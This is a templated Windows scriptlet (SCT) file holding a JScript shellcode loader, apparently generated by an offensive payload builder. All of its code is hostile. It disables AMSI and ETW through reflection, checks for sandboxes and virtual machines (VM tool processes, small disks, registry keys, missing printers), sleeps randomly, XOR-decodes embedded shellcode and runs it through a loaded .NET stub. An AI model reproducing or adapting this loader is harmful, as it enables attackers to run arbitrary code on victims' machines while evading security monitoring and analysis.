<?XML version="1.0"?>
<scriptlet>
<registration
    progid="{{ v.progid }}"
    classid="{{ '{' }}{{ v.clsid }}{{ '}' }}"
    description="{{ v.desc }}"
    remotable="true">
    <script language="JScript">
    <![CDATA[
    function {{ v.fn_build_str }}(a){var s="";for(var i=0;i<a.length;i++)s+=String.fromCharCode(a[i]);return s;}

    function {{ v.fn_amsi }}() {
        try {
            var asm  = new ActiveXObject("System.Reflection.Assembly");
            var amsi = asm.GetType({{ v.fn_build_str }}([{{ v.jsc_auto_amsi_utils }}]));
            if (amsi !== null)
                amsi.GetField({{ v.fn_build_str }}([{{ v.jsc_amsi_init_fail }}]), 36).SetValue(null, true);
        } catch(e) {}
    }

    function {{ v.fn_etw }}() {
        try {
            var asm = new ActiveXObject("System.Reflection.Assembly");
            var t   = asm.GetType({{ v.fn_build_str }}([{{ v.jsc_eventing_ep }}]));
            if (t !== null) {
                var fi = t.GetField({{ v.fn_build_str }}([{{ v.jsc_m_enabled }}]), 36);
                if (fi !== null) fi.SetValue(null, 0);
            }
        } catch(e) {}
    }

    function {{ v.fn_sandbox }}() {
        try {
            var wmi  = GetObject("winmgmts:");
            var bad  = ["vmtoolsd.exe","vboxservice.exe","cuckoo.exe","vmsrvc.exe","qemu-ga.exe","prl_tools.exe","xenservice.exe","sandboxiedcomlaunch.exe","vmusrvc.exe"];
            var pq   = wmi.ExecQuery("SELECT Name FROM Win32_Process");
            for (var e = new Enumerator(pq); !e.atEnd(); e.moveNext()) {
                var n = e.item().Name.toLowerCase();
                for (var i = 0; i < bad.length; i++) { if (n === bad[i]) return true; }
            }
            var mq = wmi.ExecQuery("SELECT ScreenWidth,ScreenHeight FROM Win32_DesktopMonitor");
            for (var em = new Enumerator(mq); !em.atEnd(); em.moveNext()) {
                var d = em.item();
                if (d.ScreenWidth && d.ScreenWidth < 800) return true;
            }
        } catch(e) {}
        try {
            var fso = new ActiveXObject("Scripting.FileSystemObject");
            var drv = fso.GetDrive("C:");
            if (drv.TotalSize < 53687091200) return true;
        } catch(e) {}
        try {
            var sh = new ActiveXObject("WScript.Shell");
            sh.RegRead("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Tools\\InstallPath");
            return true;
        } catch(e) {}
        try {
            var sh2 = new ActiveXObject("WScript.Shell");
            sh2.RegRead("HKLM\\SOFTWARE\\Oracle\\VirtualBox Guest Additions\\Version");
            return true;
        } catch(e) {}
        try {
            var wmi2 = GetObject("winmgmts:");
            var prq = wmi2.ExecQuery("SELECT Name FROM Win32_Printer");
            var pc = 0;
            for (var ep = new Enumerator(prq); !ep.atEnd(); ep.moveNext()) pc++;
            if (pc === 0) return true;
        } catch(e) {}
        try {
            var wmi3 = GetObject("winmgmts:");
            var naq = wmi3.ExecQuery("SELECT MACAddress FROM Win32_NetworkAdapter WHERE MACAddress IS NOT NULL");
            var nac = 0;
            for (var ena = new Enumerator(naq); !ena.atEnd(); ena.moveNext()) nac++;
            if (nac < 2) return true;
        } catch(e) {}
        try {
            var _env = new ActiveXObject("WScript.Shell").Environment("Process");
            if (_env("VBOX_VERSION") !== "") return true;
            if (_env("SANDBOXIE_HOME") !== "") return true;
        } catch(e) {}
        return false;
    }

    function {{ v.fn_hex }}(h) {
        var a = []; for (var i = 0; i < h.length; i += 2)
            a.push(parseInt(h.substr(i, 2), 16));
        return a;
    }

    function {{ v.fn_xor }}(d, k) {
        var o = []; for (var i = 0; i < d.length; i++)
            o.push(d[i] ^ k[i % k.length]);
        return o;
    }

    function {{ v.fn_run }}() {
        if ({{ v.fn_sandbox }}()) return;
        WScript.Sleep(2000 + Math.floor(Math.random() * 3000));
        {{ v.fn_amsi }}();
        {{ v.fn_etw }}();
        var _k = {{ v.fn_hex }}({% for chunk in key_chunks %}"{{ chunk }}"{% if not loop.last %}+{% endif %}{% endfor %});
        for (var _ki = 0; _ki < _k.length; _ki++) _k[_ki] ^= {{ key_tweak }};
        var sc = {{ v.fn_xor }}({{ v.fn_hex }}({% for chunk in shellcode_chunks %}"{{ chunk }}"{% if not loop.last %}+{% endif %}{% endfor %}), _k);
        var loader = new ActiveXObject("System.Reflection.Assembly");
        var asm = loader.Load({{ v.fn_hex }}("{{ v.dotnet_stub_hex }}"));
        asm.GetType("Stub.Loader").GetMethod("Run").Invoke(null, [sc]);
    }

    {{ v.fn_run }}();
    ]]>
    </script>
</registration>
</scriptlet>
